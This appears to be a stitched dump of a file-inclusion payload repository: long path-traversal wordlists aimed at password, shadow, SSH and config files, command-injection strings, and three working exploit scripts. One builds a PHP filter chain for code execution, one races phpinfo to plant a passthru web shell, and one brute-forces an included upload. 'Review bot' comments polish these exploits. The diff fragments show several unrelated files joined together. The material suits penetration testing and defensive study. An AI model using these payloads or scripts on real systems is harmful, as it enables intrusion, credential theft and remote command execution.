\..\..\..\..\..\..\..\..\..\..\etc\shadow%00
..\..\..\..\..\..\..\..\..\..\etc\passwd%00
..\..\..\..\..\..\..\..\..\..\etc\shadow%00
%0a/bin/cat%20/etc/passwd
%0a/bin/cat%20/etc/shadow
%00/etc/passwd%00
%00/etc/shadow%00
%00../../../../../../etc/passwd
%00../../../../../../etc/shadow
/../../../../../../../../../../../etc/passwd%00.jpg
/../../../../../../../../../../../etc/passwd%00.html
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini
\\&apos;/bin/cat%20/etc/passwd\\&apos;
\\&apos;/bin/cat%20/etc/shadow\\&apos;
../../../../../../../../conf/server.xml
/../../../../../../../../bin/id|
C:/inetpub/wwwroot/global.asa
C:\inetpub\wwwroot\global.asa
C:/boot.ini
C:\boot.ini
../../../../../../../../../../../../localstart.asp%00
../../../../../../../../../../../../localstart.asp
../../../../../../../../../../../../boot.ini%00
../../../../../../../../../../../../boot.ini
/./././././././././././boot.ini
/../../../../../../../../../../../boot.ini%00
/../../../../../../../../../../../boot.ini
/..\../..\../..\../..\../..\../..\../boot.ini
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
\..\..\..\..\..\..\..\..\..\..\boot.ini
..\..\..\..\..\..\..\..\..\..\boot.ini%00
..\..\..\..\..\..\..\..\..\..\boot.ini
/../../../../../../../../../../../boot.ini%00.html
/../../../../../../../../../../../boot.ini%00.jpg
/.../.../.../.../.../
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini
/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd

File diff suppressed because it is too large Load Diff

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

5942
Dom Clobbering/index.html Normal file

File diff suppressed because one or more lines are too long


@ -0,0 +1,60 @@
import requests
url = "http://localhost:8000/chall.php"
file_to_use = "/etc/passwd"
command = "id"
#<?=`$_GET[0]`;;?>
base64_payload = "PD89YCRfR0VUWzBdYDs7Pz4"
conversions = {
'R': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2',
'B': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2',
'C': 'convert.iconv.UTF8.CSISO2022KR',
'8': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2',
'9': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB',
'f': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.SHIFTJISX0213',
's': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61',
'z': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS',
'U': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932',
'P': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213',
'V': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5',
'0': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2',
'Y': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2',
'W': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.851.UTF8|convert.iconv.L7.UCS2',
'd': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2',
'D': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2',
'7': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2',
'4': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2'
}
# generate some garbage base64
filters = "convert.iconv.UTF8.CSISO2022KR|"
filters += "convert.base64-encode|"
# make sure to get rid of any equal signs in both the string we just generated and the rest of the file
filters += "convert.iconv.UTF8.UTF7|"
for c in base64_payload[::-1]:
filters += conversions[c] + "|"
# decode and reencode to get rid of everything that isn't valid base64
filters += "convert.base64-decode|"
filters += "convert.base64-encode|"
# get rid of equal signs
filters += "convert.iconv.UTF8.UTF7|"
filters += "convert.base64-decode"
final_payload = f"php://filter/{filters}/resource={file_to_use}"
with open('payload', 'w') as f:
f.write(final_payload)
r = requests.get(url, params={
"0": command,
"action": "include",
"file": final_payload
})
print(r.text)
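Review bot: Everything here runs at module level against the hard-coded `url`, so merely importing the file writes `payload` into the current directory and sends the request; putting the I/O in `def main():` behind `if __name__ == "__main__":` would separate chain construction from the network call. `requests.get` is called without `timeout=`. `conversions[c]` raises a bare KeyError if `base64_payload` is edited to contain a character missing from the table, which deserves an explicit error message naming the character. The comment above `base64_payload` could say that it is the decoded form of that string, with the base64 padding dropped.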


@ -0,0 +1,200 @@
#!/usr/bin/python
# https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf
# The following line is not required but supposedly optimizes code.
# However, this breaks on some Python 2 installations, where the future module version installed is > 0.16. This can be a pain to revert.
# from builtins import range
from __future__ import print_function
import sys
import threading
import socket
def setup(host, port):
TAG="Security Test"
PAYLOAD="""%s\r
<?php $c=fopen('/tmp/g','w');fwrite($c,'<?php passthru($_GET["f"]);?>');?>\r""" % TAG
REQ1_DATA="""-----------------------------7dbff1ded0714\r
Content-Disposition: form-data; name="dummyname"; filename="test.txt"\r
Content-Type: text/plain\r
\r
%s
-----------------------------7dbff1ded0714--\r""" % PAYLOAD
padding="A" * 5000
REQ1="""POST /phpinfo.php?a="""+padding+""" HTTP/1.1\r
Cookie: PHPSESSID=q249llvfromc1or39t6tvnun42; othercookie="""+padding+"""\r
HTTP_ACCEPT: """ + padding + """\r
HTTP_USER_AGENT: """+padding+"""\r
HTTP_ACCEPT_LANGUAGE: """+padding+"""\r
HTTP_PRAGMA: """+padding+"""\r
Content-Type: multipart/form-data; boundary=---------------------------7dbff1ded0714\r
Content-Length: %s\r
Host: %s\r
\r
%s""" %(len(REQ1_DATA),host,REQ1_DATA)
#modify this to suit the LFI script
LFIREQ="""GET /lfi.php?load=%s%%00 HTTP/1.1\r
User-Agent: Mozilla/4.0\r
Proxy-Connection: Keep-Alive\r
Host: %s\r
\r
\r
"""
return (REQ1, TAG, LFIREQ)
def phpInfoLFI(host, port, phpinforeq, offset, lfireq, tag):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s2.connect((host, port))
s.send(phpinforeq)
d = ""
while len(d) < offset:
d += s.recv(offset)
try:
i = d.index("[tmp_name] =>")
if i == -1:
i = d.index("[tmp_name] =&gt;")
fn = d[i+17:i+31]
except ValueError:
return None
s2.send(lfireq % (fn, host))
d = s2.recv(4096)
s.close()
s2.close()
if d.find(tag) != -1:
return fn
counter=0
class ThreadWorker(threading.Thread):
def __init__(self, e, l, m, *args):
threading.Thread.__init__(self)
self.event = e
self.lock = l
self.maxattempts = m
self.args = args
def run(self):
global counter
while not self.event.is_set():
with self.lock:
if counter >= self.maxattempts:
return
counter+=1
try:
x = phpInfoLFI(*self.args)
if self.event.is_set():
break
if x:
print("\nGot it! Shell created in /tmp/g")
self.event.set()
except socket.error:
return
def getOffset(host, port, phpinforeq):
"""Gets offset of tmp_name in the php output"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
s.send(phpinforeq)
d = ""
while True:
i = s.recv(4096)
d+=i
if i == "":
break
# detect the final chunk
if i.endswith("0\r\n\r\n"):
break
s.close()
i = d.find("[tmp_name] =>")
if i == -1:
i = d.find("[tmp_name] =&gt;")
if i == -1:
raise ValueError("No php tmp_name in phpinfo output")
print("found %s at %i" % (d[i:i+10],i))
# padded up a bit
return i+256
def main():
print("LFI With PHPInfo()")
print("-=" * 30)
if len(sys.argv) < 2:
print("Usage: %s host [port] [threads]" % sys.argv[0])
sys.exit(1)
try:
host = socket.gethostbyname(sys.argv[1])
except socket.error as e:
print("Error with hostname %s: %s" % (sys.argv[1], e))
sys.exit(1)
port=80
try:
port = int(sys.argv[2])
except IndexError:
pass
except ValueError as e:
print("Error with port %d: %s" % (sys.argv[2], e))
sys.exit(1)
poolsz=10
try:
poolsz = int(sys.argv[3])
except IndexError:
pass
except ValueError as e:
print("Error with poolsz %d: %s" % (sys.argv[3], e))
sys.exit(1)
print("Getting initial offset...", end=' ')
reqphp, tag, reqlfi = setup(host, port)
offset = getOffset(host, port, reqphp)
sys.stdout.flush()
maxattempts = 1000
e = threading.Event()
l = threading.Lock()
print("Spawning worker pool (%d)..." % poolsz)
sys.stdout.flush()
tp = []
for i in range(0,poolsz):
tp.append(ThreadWorker(e,l,maxattempts, host, port, reqphp, offset, reqlfi, tag))
for t in tp:
t.start()
try:
while not e.wait(1):
if e.is_set():
break
with l:
sys.stdout.write( "\r% 4d / % 4d" % (counter, maxattempts))
sys.stdout.flush()
if counter >= maxattempts:
break
print()
if e.is_set():
print("Woot! \m/")
else:
print(":(")
except KeyboardInterrupt:
print("\nTelling threads to shutdown...")
e.set()
print("Shuttin' down...")
for t in tp:
t.join()
if __name__=="__main__":
print("Don't forget to modify the LFI URL")
main()
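Review bot: The `ValueError` handlers in `main` format `sys.argv[2]` and `sys.argv[3]` with `%d`, but both are strings, so a non-numeric port or pool size raises TypeError inside the handler instead of printing the error; `"Error with port %s: %s"` and `"Error with poolsz %s: %s"` fix that. `phpInfoLFI` returns from its `except ValueError` branch without closing `s` and `s2`, so each miss leaks two sockets across up to 1000 attempts; a `try/finally` that closes both would bound descriptor use. Neither socket has a timeout set, so a stalled peer can hang a worker and the final `t.join()`.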


@ -0,0 +1,22 @@
from __future__ import print_function
from builtins import range
import itertools
import requests
import string
import sys
print('[+] Trying to win the race')
f = {'file': open('shell.php', 'rb')}
for _ in range(4096 * 4096):
requests.post('http://target.com/index.php?c=index.php', f)
print('[+] Bruteforcing the inclusion')
for fname in itertools.combinations(string.ascii_letters + string.digits, 6):
url = 'http://target.com/index.php?c=/tmp/php' + fname
r = requests.get(url)
if 'load average' in r.text: # <?php echo system('uptime');
print('[+] We have got a shell: ' + url)
sys.exit(0)
print('[x] Something went wrong, please try again')
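Review bot: Both request URLs hard-code `target.com`, which is a registered third-party domain, so running the file unedited sends the upload loop and the lookup requests to someone else's site; a reserved name such as `target.example` (RFC 2606) or a required command-line argument avoids that. The handle from `open('shell.php', 'rb')` is never closed; a `with` block would scope it. The first loop runs `4096 * 4096` iterations and no request passes `timeout=`, so one stalled connection blocks the whole run.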


@ -0,0 +1,13 @@
/usr/pkg/etc/httpd/httpd.conf
/usr/local/etc/apache22/httpd.conf
/usr/local/etc/apache2/httpd.conf
/var/www/conf/httpd.conf
/var/www/logs/error_log
/var/www/logs/access_log
/etc/apache2/httpd2.conf
/var/apache2/logs/error_log
/var/apache2/logs/access_log
/var/log/httpd-error.log
/var/log/httpd-access.log
/var/log/httpd/error_log
/var/log/httpd/access_log


@ -0,0 +1,879 @@
/.../.../.../.../.../
\…..\\\…..\\\…..\\\
%00../../../../../../etc/passwd
%00/etc/passwd%00
%00../../../../../../etc/shadow
%00/etc/shadow%00
%0a/bin/cat%20/etc/passwd
%0a/bin/cat%20/etc/shadow
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini
/../../../../../../../../%2A
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow
..%2F..%2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed
..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd
..%2F..%2F..%2F%2F..%2F..%2Fetc/shadow
=3D “/..” . “%2f..
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/boot.ini
admin/access_log
/admin/install.php
../../../administrator/inbox
/apache2/logs/access_log
/apache2/logs/access.log
/apache2/logs/error_log
/apache2/logs/error.log
/apache/logs/access_log
/apache/logs/access.log
../../../../../apache/logs/access.log
../../../../apache/logs/access.log
../../../apache/logs/access.log
../../apache/logs/access.log
../apache/logs/access.log
/apache/logs/error_log
/apache/logs/error.log
../../../../../apache/logs/error.log
../../../../apache/logs/error.log
../../../apache/logs/error.log
../../apache/logs/error.log
../apache/logs/error.log
/apache\php\php.ini
\\&apos;/bin/cat%20/etc/passwd\\&apos;
\\&apos;/bin/cat%20/etc/shadow\\&apos;
/.bash_history
/.bash_profile
/.bashrc
/../../../../../../../../bin/id|
/bin/php.ini
/boot/grub/grub.conf
/./././././././././././boot.ini
/../../../../../../../../../../../boot.ini
/..\../..\../..\../..\../..\../..\../boot.ini
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
..//..//..//..//..//boot.ini
../../../../../../../../../../../../boot.ini
../../boot.ini
..\../..\../..\../..\../boot.ini
..\../..\../boot.ini
..\..\..\..\..\..\..\..\..\..\boot.ini
\..\..\..\..\..\..\..\..\..\..\boot.ini
/../../../../../../../../../../../boot.ini%00
../../../../../../../../../../../../boot.ini%00
..\..\..\..\..\..\..\..\..\..\boot.ini%00
/../../../../../../../../../../../boot.ini%00.html
/../../../../../../../../../../../boot.ini%00.jpg
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow
c:\apache\logs\access.log
c:\apache\logs\error.log
c:\AppServ\MySQL
C:/boot.ini
C:\boot.ini
/C:/inetpub/ftproot/
C:/inetpub/wwwroot/global.asa
C:\inetpub\wwwroot\global.asa
c:\inetpub\wwwroot\index.asp
/config.asp
../config.asp
config.asp
../config.inc.php
config.inc.php
../config.js
config.js
_config.php
../_config.php
../config.php
config.php
../_config.php%00
../../../../../../../../conf/server.xml
/core/config.php
/C:\Program Files\
c:\Program Files\Apache Group\Apache\logs\access.log
c:\Program Files\Apache Group\Apache\logs\error.log
/.cshrc
c:\System32\Inetsrv\metabase.xml
c:WINDOWS/system32/
d:\AppServ\MySQL
database.asp
database.js
database.php
data.php
dbase.php a
db.php
../../../../../../../dev
/D:\Program Files\
d:\System32\Inetsrv\metabase.xml
/etc/apache2/apache2.conf
/etc/apache2/conf/httpd.conf
/etc/apache2/httpd.conf
/etc/apache2/sites-available/default
/etc/apache2/vhosts.d/default_vhost.include
/etc/apache/apache.conf
/etc/apache/conf/httpd.conf
/etc/apache/httpd.conf
/etc/apt/sources.list
/etc/chrootUsers
/etc/crontab
/etc/defaultdomain
/etc/default/passwd
/etc/defaultrouter
/etc/fstab
/etc/ftpchroot
/etc/ftphosts
/etc/group
/etc/hostname.bge
/etc/hostname.ce0
/etc/hostname.ce1
/etc/hostname.ce2
/etc/hostname.ce3
/etc/hostname.dcelx0
/etc/hostname.dcelx1
/etc/hostname.dcelx2
/etc/hostname.dcelx3
/etc/hostname.dmfe0
/etc/hostname.dmfe1
/etc/hostname.dmfe2
/etc/hostname.dmfe3
/etc/hostname.dnet0
/etc/hostname.dnet1
/etc/hostname.dnet2
/etc/hostname.dnet3
/etc/hostname.ecn0
/etc/hostname.ecn1
/etc/hostname.ecn2
/etc/hostname.ecn3
/etc/hostname.elx0
/etc/hostname.elx1
/etc/hostname.elx2
/etc/hostname.elx3
/etc/hostname.elxl0
/etc/hostname.elxl1
/etc/hostname.elxl2
/etc/hostname.elxl3
/etc/hostname.eri0
/etc/hostname.eri1
/etc/hostname.eri2
/etc/hostname.eri3
/etc/hostname.ge0
/etc/hostname.ge1
/etc/hostname.ge2
/etc/hostname.ge3
/etc/hostname.hme0
/etc/hostname.hme1
/etc/hostname.hme2
/etc/hostname.hme3
/etc/hostname.ieef0
/etc/hostname.ieef1
/etc/hostname.ieef2
/etc/hostname.ieef3
/etc/hostname.iprb0
/etc/hostname.iprb1
/etc/hostname.iprb2
/etc/hostname.iprb3
/etc/hostname.le0
/etc/hostname.le1
/etc/hostname.le2
/etc/hostname.le3
/etc/hostname.lo
/etc/hostname.pcn0
/etc/hostname.pcn1
/etc/hostname.pcn2
/etc/hostname.pcn3
/etc/hostname.qfe0
/etc/hostname.qfe1
/etc/hostname.qfe2
/etc/hostname.qfe3
/etc/hostname.spwr0
/etc/hostname.spwr1
/etc/hostname.spwr2
/etc/hostname.spwr3
/etc/hosts
../../../../../../../../../../../../etc/hosts
../../../../../../../../../../../../etc/hosts%00
/etc/hosts.allow
/etc/hosts.deny
/etc/hosts.equiv
/etc/http/conf/httpd.conf
/etc/httpd.conf
/etc/httpd/conf.d/php.conf
/etc/httpd/conf.d/squirrelmail.conf
/etc/httpd/conf.d/ssl.conf
/etc/httpd/conf/httpd.conf
/etc/httpd/httpd.conf
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
../../../../../../../etc/httpd/logs/acces_log
../../../../../../../etc/httpd/logs/acces.log
/etc/httpd/logs/access_log
/etc/httpd/logs/access.log
../../../../../etc/httpd/logs/access_log
../../../../../etc/httpd/logs/access.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
../../../../../../../etc/httpd/logs/error_log
../../../../../../../etc/httpd/logs/error.log
../../../../../etc/httpd/logs/error_log
../../../../../etc/httpd/logs/error.log
/etc/httpd/php.ini
/etc/http/httpd.conf
/etc/inetd.conf
/etc/init.d/apache
/etc/init.d/apache2
/etc/issue
/etc/logrotate.d/ftp
/etc/logrotate.d/httpd
/etc/logrotate.d/proftpd
/etc/logrotate.d/vsftpd.log
/etc/mail/access
/etc/mailman/mm_cfg.py
/etc/make.conf
/etc/master.passwd
/etc/motd
/etc/my.cnf
/etc/mysql/my.cnf
/etc/netconfig
/etc/nsswitch.conf
/etc/opt/ipf/ipf.conf
/etc/opt/ipf/ipnat.conf
/./././././././././././etc/passwd
/../../../../../../../../../../etc/passwd
/../../../../../../../../../../etc/passwd^^
/..\../..\../..\../..\../..\../..\../etc/passwd
/etc/passwd
../../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../etc/passwd
../../../../etc/passwd
../../../etc/passwd
../../etc/passwd
../etc/passwd
..\..\..\..\..\..\..\..\..\..\etc\passwd
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
\..\..\..\..\..\..\..\..\..\..\etc\passwd
etc/passwd
/etc/passwd%00
../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../etc/passwd%00
../../../../../../../../../etc/passwd%00
../../../../../../../../etc/passwd%00
../../../../../../../etc/passwd%00
../../../../../../etc/passwd%00
../../../../../etc/passwd%00
../../../../etc/passwd%00
../../../etc/passwd%00
../../etc/passwd%00
../etc/passwd%00
..\..\..\..\..\..\..\..\..\..\etc\passwd%00
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00
/../../../../../../../../../../../etc/passwd%00.html
/../../../../../../../../../../../etc/passwd%00.jpg
../../../../../../etc/passwd&=%3C%3C%3C%3C
/etc/php4.4/fcgi/php.ini
/etc/php4/apache2/php.ini
/etc/php4/apache/php.ini
/etc/php4/cgi/php.ini
/etc/php5/apache2/php.ini
/etc/php5/apache/php.ini
/etc/php5/cgi/php.ini
/etc/php/apache2/php.ini
/etc/php/apache/php.ini
/etc/php/cgi/php.ini
/etc/php.d/dom.ini
/etc/php.d/gd.ini
/etc/php.d/imap.ini
/etc/php.d/json.ini
/etc/php.d/ldap.ini
/etc/php.d/mbstring.ini
/etc/php.d/mysqli.ini
/etc/php.d/mysql.ini
/etc/php.d/odbc.ini
/etc/php.d/pdo.ini
/etc/php.d/pdo_mysql.ini
/etc/php.d/pdo_odbc.ini
/etc/php.d/pdo_pgsql.ini
/etc/php.d/pdo_sqlite.ini
/etc/php.d/pgsql.ini
/etc/php.d/xmlreader.ini
/etc/php.d/xmlwriter.ini
/etc/php.d/xsl.ini
/etc/php.d/zip.ini
/etc/php.ini
/etc/php/php4/php.ini
/etc/php/php.ini
/etc/postfix/mydomains
/etc/proftp.conf
/etc/proftpd/modules.conf
/etc/protpd/proftpd.conf
/etc/pure-ftpd.conf
/etc/pureftpd.passwd
/etc/pureftpd.pdb
/etc/pure-ftpd/pure-ftpd.conf
/etc/pure-ftpd/pure-ftpd.pdb
/etc/pure-ftpd/pureftpd.pdb
/etc/release
/etc/resolv.conf
/etc/rpc
/etc/security/environ
/etc/security/failedlogin
/etc/security/group
/etc/security/lastlog
/etc/security/limits
/etc/security/passwd
/etc/security/user
/./././././././././././etc/shadow
/../../../../../../../../../../etc/shadow
/../../../../../../../../../../etc/shadow^^
/..\../..\../..\../..\../..\../..\../etc/shadow
/etc/shadow
../../../../../../../../../../../../etc/shadow
..\..\..\..\..\..\..\..\..\..\etc\shadow
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow
\..\..\..\..\..\..\..\..\..\..\etc\shadow
../../../../../../../../../../../../../../../../../../../../../../etc/shadow%00
../../../../../../../../../../../../etc/shadow%00
..\..\..\..\..\..\..\..\..\..\etc\shadow%00
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00
etc/shadow%00
/etc/ssh/sshd_config
/etc/sudoers
/etc/syslog.conf
/etc/syslogd.conf
/etc/system
/etc/updatedb.conf
/etc/utmp
/etc/vfstab
/etc/vhcs2/proftpd/proftpd.conf
/etc/vsftpd.chroot_list
/etc/vsftpd.conf
/etc/vsftpd/vsftpd.conf
/etc/wtmp
/etc/wu-ftpd/ftpaccess
/etc/wu-ftpd/ftphosts
/etc/wu-ftpd/ftpusers
/.forward
/home2\bin\stable\apache\php.ini
/home/apache/conf/httpd.conf
/home/apache/httpd.conf
/home\bin\stable\apache\php.ini
/.htpasswd
.htpasswd
../.htpasswd
../install.php
install.php
../../../../../../../../../../../../localstart.asp
../../../../../../../../../../../../localstart.asp%00
/log/miscDir/accesslog
/.logout
/logs/access_log
/logs/access.log
../../../../../logs/access.log
../../../../logs/access.log
../../../logs/access.log
../../logs/access.log
../logs/access.log
/logs/error_log
/logs/error.log
../../../../../logs/error.log
../../../../logs/error.log
../../../logs/error.log
../../logs/error.log
../logs/error.log
/logs/pure-ftpd.log
/master.passwd
member/.htpasswd
members/.htpasswd
/.netrc
/NetServer\bin\stable\apache\php.ini
/opt/apache2/conf/httpd.conf
/opt/apache/conf/httpd.conf
/opt/lampp/logs/access_log
/opt/lampp/logs/access.log
/opt/lampp/logs/error_log
/opt/lampp/logs/error.log
/opt/xampp/etc/php.ini
/opt/xampp/logs/access_log
/opt/xampp/logs/access.log
/opt/xampp/logs/error_log
/opt/xampp/logs/error.log
.pass
../.pass
pass.dat
passwd
/.passwd
.passwd
../.passwd
passwd.dat
/php4\php.ini
/php5\php.ini
/php\php.ini
/PHP\php.ini
/private/etc/httpd/httpd.conf
/private/etc/httpd/httpd.conf.default
/proc/cpuinfo
/proc/interrupts
/proc/loadavg
/proc/meminfo
/proc/mounts
/proc/net/arp
/proc/net/dev
/proc/net/route
/proc/net/tcp
/proc/partitions
/proc/self/cmdline
/proc/self/envron
/proc/version
/.profile
/Program Files\Apache Group\Apache2\conf\httpd.conf
/Program Files\Apache Group\Apache\conf\httpd.conf
/Program Files\Apache Group\Apache\logs\access.log
/Program Files\Apache Group\Apache\logs\error.log
/Program Files\xampp\apache\conf\httpd.conf
/../../../../pswd
/.rhosts
/root/.bash_history
/root/.bash_logut
root/.htpasswd
/root/.ksh_history
/root/.Xauthority
/.sh_history
/.shosts
/.ssh/authorized_keys
user/.htpasswd
../users.db.php
users.db.php
users/.htpasswd
/usr/apache2/conf/httpd.conf
/usr/apache/conf/httpd.conf
/usr/etc/pure-ftpd.conf
/usr/lib/cron/log
/usr/lib/php.ini
/usr/lib/php/php.ini
/usr/lib/security/mkuser.default
/usr/local/apache2/conf/httpd.conf
/usr/local/apache2/httpd.conf
/usr/local/apache2/logs/access_log
/usr/local/apache2/logs/access.log
/usr/local/apache2/logs/error_log
